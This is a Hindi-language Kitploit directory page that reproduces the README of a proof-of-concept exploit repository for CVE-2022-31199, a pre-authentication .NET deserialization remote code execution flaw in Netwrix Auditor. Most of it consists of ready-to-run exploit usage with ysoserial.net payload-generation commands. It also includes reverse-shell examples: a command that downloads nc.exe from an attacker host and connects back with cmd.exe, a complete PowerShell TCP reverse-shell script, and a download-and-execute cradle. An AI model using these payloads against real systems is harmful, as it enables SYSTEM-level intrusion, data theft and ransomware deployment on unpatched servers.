Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-31199 — # CVE-2022-31199 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Netwrix Auditor में एक गंभीर .NET डिसीरियलाइज़ेशन RCE भेद्यता। इसमें Python और PowerShell स्क्रिप्ट, ysoserial.net के साथ पेलोड जनरेशन, और अधिकृत सुरक्षा परीक्षण के लिए डिटेक्शन सिग्नेचर शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/developerfred/cve-2022-31199
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंटलैब और अभ्यास
GitHub
developerfred/cve-2022-31199

CVE-2022-31199

# CVE-2022-31199 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Netwrix Auditor में एक गंभीर .NET डिसीरियलाइज़ेशन RCE भेद्यता। इसमें Python और PowerShell स्क्रिप्ट, ysoserial.net के साथ पेलोड जनरेशन, और अधिकृत सुरक्षा परीक्षण के लिए डिटेक्शन सिग्नेचर शामिल हैं।

रिपॉजिटरी देखें
1310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-31199 - Netwrix Auditor RCE शोषण POCs

🔍 भेद्यता अवलोकन

CVE-2022-31199 Netwrix Auditor के 10.5 से पहले के संस्करणों में एक गंभीर असुरक्षित ऑब्जेक्ट डी-सीरियलाइज़ेशन भेद्यता है। यह भेद्यता TCP पोर्ट 9004 पर सुनने वाली एक असुरक्षित .NET Remoting सेवा में मौजूद है, जो अनप्रमाणित दूरस्थ हमलावरों को NT AUTHORITY\SYSTEM विशेषाधिकारों के साथ मनमाना कोड निष्पादन प्राप्त करने की अनुमति देती है।

भेद्यता विवरण

  • CVE आईडी: CVE-2022-31199
  • CVSS स्कोर: 9.8 (गंभीर)
  • CWE: CWE-502 (अविश्वसनीय डेटा का डी-सीरियलाइज़ेशन)
  • प्रभावित संस्करण: Netwrix Auditor < 10.5
  • आक्रमण वेक्टर: नेटवर्क (अनप्रमाणित)
  • आवश्यक विशेषाधिकार: कोई नहीं
  • प्रभाव: SYSTEM विशेषाधिकारों के साथ पूर्ण सिस्टम से समझौता
  • CISA KEV: ज्ञात शोषित भेद्यता सूची (Known Exploited Vulnerabilities Catalog) में सूचीबद्ध

वास्तविक-विश्व प्रभाव

यह भेद्यता वास्तविक दुनिया में सक्रिय रूप से शोषित की जा चुकी है:

  • Truebot मैलवेयर अभियान (रूस-संबद्ध CL0P/TA505 रैनसमवेयर ऑपरेटर)
  • Silence साइबर अपराधी समूह
  • FIN11 खतरा अभिनेता

सफल शोषण आमतौर पर निम्न की ओर ले जाता है:

  • पूर्ण Active Directory डोमेन समझौता
  • निगरानी प्रणालियों में पार्श्व संचलन (lateral movement)
  • डेटा बहिर्गमन (exfiltration)
  • रैनसमवेयर परिनियोजन

📦 रिपॉजिटरी सामग्री

इस रिपॉजिटरी में CVE-2022-31199 के लिए पूर्ण प्रूफ-ऑफ-कॉन्सेप्ट (POC) शोषण शामिल हैं:

फ़ाइलें

  1. exploit.py - Python-आधारित शोषण फ्रेमवर्क
  2. exploit.ps1 - PowerShell शोषण स्क्रिप्ट
  3. README.md - यह दस्तावेज़
  4. manual-exploitation.md - चरण-दर-चरण मैनुअल शोषण गाइड

🛠️ आवश्यकताएँ

आवश्यक उपकरण

Windows-आधारित शोषण (अनुशंसित)

  • ysoserial.net - .NET डी-सीरियलाइज़ेशन पेलोड जनरेटर

    • डाउनलोड: https://github.com/pwntester/ysoserial.net
    • रिलीज़: https://github.com/pwntester/ysoserial.net/releases
  • ExploitRemotingService - .NET Remoting शोषण उपकरण

    • डाउनलोड: https://github.com/tyranid/ExploitRemotingService
    • वैकल्पिक (उन्नत): https://github.com/codewhitesec/ExploitRemotingService

Python स्क्रिप्ट आवश्यकताएँ

  • Python 3.6 या उच्चतर
  • केवल मानक लाइब्रेरी (बुनियादी जाँच के लिए कोई बाहरी निर्भरता नहीं)
  • ysoserial.net और ExploitRemotingService निष्पादनयोग्य फ़ाइलों तक पहुँच

PowerShell स्क्रिप्ट आवश्यकताएँ

  • PowerShell 5.1 या उच्चतर
  • Windows ऑपरेटिंग सिस्टम
  • स्क्रिप्ट निर्देशिका में ysoserial.exe और ExploitRemotingService.exe

🚀 त्वरित आरंभ

1. जाँचें कि क्या लक्ष्य भेद्य है

Python का उपयोग करके:

python3 exploit.py --target 192.168.1.100 --check

PowerShell का उपयोग करके:

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

2. पेलोड जनरेट करें

# Using ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"

3. शोषण निष्पादित करें

Python (पूर्व-जनरेट किए गए पेलोड के साथ):

python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]

PowerShell (स्वचालित):

.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

📖 विस्तृत उपयोग

Python शोषण (exploit.py)

बुनियादी भेद्यता जाँच

python3 exploit.py --target 10.10.10.100 --check

कस्टम पेलोड के साथ संपूर्ण शोषण

# Step 1: Generate payload
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"

# Step 2: Execute exploit
python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]

उन्नत विकल्प

# Custom port
python3 exploit.py --target 10.10.10.100 --port 9004 --check

# Custom endpoint
python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check

कमांड लाइन तर्क

--target    : Target IP address or hostname (required)
--port      : Target port (default: 9004)
--endpoint  : .NET Remoting endpoint name (default: UAVRServer)
--check     : Only check vulnerability, don't exploit
--payload   : Base64 encoded payload from ysoserial.net

PowerShell शोषण (exploit.ps1)

केवल भेद्यता जाँच

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

कमांड निष्पादित करें

# Simple command execution
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

# Write output to file
.\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"

# Custom port
.\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"

पैरामीटर

-Target     : Target IP address or hostname (required)
-Port       : Target port (default: 9004)
-Command    : Command to execute on target (default: "whoami")
-CheckOnly  : Only check vulnerability, don't exploit

🎯 शोषण उदाहरण

उदाहरण 1: सूचना एकत्र करना

# Check system information
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"

उदाहरण 2: रिवर्स शेल

लिसनर सेटअप करें:

nc -lvnp 4444

पेलोड जनरेट करें:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"

उदाहरण 3: PowerShell रिवर्स शेल

रिवर्स शेल स्क्रिप्ट बनाएँ (rev.ps1):

$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

स्क्रिप्ट होस्ट करें:

python3 -m http.server 8000

पेलोड जनरेट करें:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"

उदाहरण 4: ExploitRemotingService का सीधे उपयोग करना

# Test connectivity
ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver

# Execute with lease mode (bypasses some protections)
ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\

# Execute with object reference
ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"

🔬 तकनीकी विवरण

भेद्यता का मूल कारण

यह भेद्यता निम्न से उत्पन्न होती है:

  1. TCP पोर्ट 9004 पर असुरक्षित .NET Remoting एंडपॉइंट
  2. उचित प्रकार फ़िल्टरिंग के बिना BinaryFormatter डी-सीरियलाइज़ेशन
  3. UAVRServer सेवा द्वारा मनमाने क्रमबद्ध ऑब्जेक्ट स्वीकार करना
  4. सामान्य परिनियोजन में SYSTEM विशेषाधिकारों के साथ चलने वाली सेवा

शोषण प्रक्रिया

1. Attacker connects to TCP port 9004
2. Identifies .NET Remoting service (UAVRServer endpoint)
3. Generates malicious serialized payload using ysoserial.net
4. Sends payload via .NET Remoting protocol
5. Target deserializes object using BinaryFormatter
6. Gadget chain executes arbitrary code
7. Code runs with NT AUTHORITY\SYSTEM privileges

समर्थित गैजेट चेन

निम्नलिखित ysoserial.net गैजेट इस भेद्यता के विरुद्ध काम करते हैं:

  • TypeConfuseDelegate (अनुशंसित)
  • ObjectDataProvider
  • PSObject
  • WindowsIdentity
  • TextFormattingRunProperties

नेटवर्क प्रोटोकॉल

.NET Remoting Protocol Structure:
┌─────────────────────────────────────┐
│ Preamble (8 bytes)                  │
│ 0x00 0x01 0x00 0x00 0x01 0x00 0x00 │
├─────────────────────────────────────┤
│ Headers                             │
├─────────────────────────────────────┤
│ URI (UAVRServer)                    │
├─────────────────────────────────────┤
│ Serialized Object (BinaryFormatter) │
└─────────────────────────────────────┘

🛡️ पहचान

नेटवर्क संकेतक

टूल डाउनलोड करें